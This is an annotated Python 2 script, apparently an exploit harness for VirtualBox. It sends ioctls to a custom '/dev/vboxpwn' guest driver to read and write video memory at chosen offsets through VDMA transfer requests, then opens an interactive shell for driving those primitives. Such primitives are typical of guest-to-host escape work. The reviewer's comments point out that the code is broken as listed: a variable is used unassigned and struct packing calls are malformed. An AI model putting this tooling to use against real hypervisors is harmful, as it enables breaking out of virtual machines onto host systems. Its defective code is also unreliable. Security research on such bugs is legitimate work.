| import os, fcntl, struct, array, sys |
| |
# ioctl request codes for the /dev/vboxpwn character device.
# Read with the generic Linux _IOC layout, the low byte is the command
# number (1..6), the next byte is the type (0x65) and bits 16-29 are the
# argument size: 0x10 (16 bytes) for the transfer/command requests and
# 0x04 for GET_VRAM_SIZE.
# NOTE(review): the driver that defines these codes is not part of this
# listing (presumably a custom guest kernel module), so the argument
# layouts cannot be confirmed from here.
IOCTL_VBOX_PWN_VDMA_READ = 0x40106501L
IOCTL_VBOX_PWN_VDMA_WRITE = 0x80106502L
IOCTL_VBOX_PWN_VBVA_COMMAND = 0x80106503L
IOCTL_VBOX_PWN_VDMA_BPB_TRANSFER_READ = 0x40106504L
IOCTL_VBOX_PWN_VDMA_BPB_TRANSFER_WRITE = 0x80106505L
IOCTL_VBOX_PWN_GET_VRAM_SIZE = 0x40046506L

# The three codes with bit 31 set exceed sys.maxint on a Python 2 build
# with 32-bit ints. There each one is swapped for the same 32-bit pattern
# read as a signed value (code - 2**32), presumably so fcntl.ioctl()
# accepts it as a C int. On builds with a larger sys.maxint nothing changes.
if sys.maxint < IOCTL_VBOX_PWN_VDMA_WRITE:
    IOCTL_VBOX_PWN_VDMA_WRITE = -2146409214  # 0x80106502 - 2**32
if sys.maxint < IOCTL_VBOX_PWN_VBVA_COMMAND:
    IOCTL_VBOX_PWN_VBVA_COMMAND = -2146409213  # 0x80106503 - 2**32
if sys.maxint < IOCTL_VBOX_PWN_VDMA_BPB_TRANSFER_WRITE:
    IOCTL_VBOX_PWN_VDMA_BPB_TRANSFER_WRITE = -2146409211  # 0x80106505 - 2**32

# Module-level handle to the device node, opened read/write and
# non-blocking as soon as the script is loaded. Every helper below uses it.
fd = os.open('/dev/vboxpwn', os.O_RDWR | os.O_NONBLOCK)

# 4/5 = BPB_TRANSFER primitive, 1/2 = PRESENT_BLT primitive
# NOTE(review): neither name is referenced by the helpers visible in this
# listing, which hard-code the BPB_TRANSFER request codes instead.
read_type, write_type = 4, 5
| |
def read(offset, size):
    """Request `size` bytes at `offset` through the BPB_TRANSFER_READ ioctl.

    The buffer handed to fcntl.ioctl() is passed with mutate_flag=1 and the
    first 16 bytes of it are dropped from the return value. 16 is also the
    argument size encoded in the ioctl number (0x10), so those bytes are
    presumably the request header -- confirm against the driver source.

    NOTE(review): as listed, this function cannot reach the ioctl call.
    `data` is extended before it is ever assigned, the header packed into
    `req` is never passed to fcntl.ioctl(), and struct.pack() is given two
    values for the three-field format "IqP". The listing looks incomplete;
    what the third ("P") field should hold is not shown on this page.
    """
    # NOTE(review): `data` has no earlier assignment in this scope.
    data += '\0'*size
    req = ''
    # Header fields in native byte order and alignment: unsigned int size,
    # 64-bit offset, pointer-sized third field (no value supplied for it).
    req += struct.pack("IqP", size, offset)
    # Converted to a signed-byte array, but not used after this line.
    req = array.array('b', req)
    fcntl.ioctl(fd, IOCTL_VBOX_PWN_VDMA_BPB_TRANSFER_READ, data, 1)
    # Disabled alternative: command 1, the PRESENT_BLT primitive according
    # to the note next to read_type/write_type.
    #fcntl.ioctl(fd, IOCTL_VBOX_PWN_VDMA_READ, data, 1)
    # Skip the leading 16 bytes and return the rest.
    return data[16:]
| |
def write(offset, payload):
    """Send `payload` for `offset` through the BPB_TRANSFER_WRITE ioctl.

    The request is a single string: a struct-packed header carrying
    len(payload) and offset, followed directly by the payload bytes.

    NOTE(review): struct.pack() receives two values for the three-field
    format "IqP", so as listed the call raises struct.error before any
    ioctl is issued. What the third ("P") field should hold is not shown
    on this page.

    NOTE(review): nothing here checks offset or len(payload) against
    vram_sz; any bounds enforcement is left to the driver and to whatever
    consumes the request behind it.
    """
    data = ''
    # Header in native byte order and alignment: unsigned int length,
    # 64-bit offset, pointer-sized third field (no value supplied for it).
    data += struct.pack("IqP", len(payload), offset)
    # Payload travels inline, immediately after the header.
    data += payload
    fcntl.ioctl(fd, IOCTL_VBOX_PWN_VDMA_BPB_TRANSFER_WRITE, data)
    # Disabled alternative: command 2, the PRESENT_BLT primitive according
    # to the note next to read_type/write_type.
    #fcntl.ioctl(fd, IOCTL_VBOX_PWN_VDMA_WRITE, data)
| |
def get_vram_size():
    """Issue the GET_VRAM_SIZE ioctl and return the reply as an integer.

    The driver's 4-byte answer is decoded as a little-endian unsigned
    32-bit value. The unit is presumably bytes -- confirm against the
    driver source, which is not part of this listing.
    """
    # A mutable 4-byte buffer: with mutate_flag=1 the ioctl result is
    # written back into this array rather than returned as a new string.
    reply = array.array('B', '\0' * 4)
    fcntl.ioctl(fd, IOCTL_VBOX_PWN_GET_VRAM_SIZE, reply, 1)
    (vram_size,) = struct.unpack('<I', reply)
    return vram_size
| |
import code

# Query the driver once at start-up and keep the answer in a module-level
# name so it is available in the interactive session below.
vram_sz = get_vram_size()

# Hand control to an interactive interpreter whose namespace is this
# module's own (fd, read, write, get_vram_size, vram_sz, the ioctl codes).
# At module level locals() is the module namespace.
code.interact(local=locals())